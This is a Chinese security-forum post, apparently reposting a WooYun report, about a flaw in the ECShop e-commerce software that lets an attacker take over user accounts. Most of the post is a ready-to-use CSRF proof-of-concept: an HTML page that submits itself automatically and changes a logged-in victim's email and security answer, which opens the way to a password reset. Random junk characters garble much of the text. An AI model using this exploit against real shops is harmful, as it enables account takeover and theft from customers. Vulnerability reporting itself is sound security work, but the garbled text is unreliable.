中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
" i) J# h9 C6 t6 D4 Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
7 [! z' [2 Q- f9 @9 [9 m; k; N  H$ g8 y; e$ z5 _
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
# c. U/ X/ A' W' C) I$ k9 ~) E
1 C- F4 m' P1 w6 F  c) ?详细说明:
: g: W- y  O0 |利用csrf和xss可以突破官方所说的“障碍”
8 p8 d; k& C: T& fxss版本已经有人说明* \/ A* [# F& j) y8 m
这里给出csrf版本
- \# H4 a2 z1 X$ B) J! S  _" }% N1 m0 i7 f) C
漏洞证明:
: F4 ], y% F) D% h. Y2 l<html>
8 ~: @# ]& q# o<body>
+ p, t- c. Y, l<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% K/ E4 S; C* O! z7 q& X8 S# |<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ M  d4 j+ Q# W. ]$ Y) l<INPUT TYPE="text" NAME="act" value="act_edit_profile">/ d/ F  n% ^$ J9 ]; t! z
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
1 u2 l/ k0 w) ~; w3 L" q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
7 D  U* h' }& _8 m, T" {% c' n7 d</body>* i+ s4 @- y1 e4 \3 e7 c6 y. i: W
<script>( l/ W# p3 z$ `7 s$ X5 w$ T
document.forms[0].submit();) q: h" N% O& X( }: R
</script>
0 U1 M( W. G! a+ B1 p/ C</html>
8 t: V4 X3 j- w, Q9 `构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失9 D" O/ W9 a+ H7 [. ~# p
8 W1 h! E8 d4 P/ t# _





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2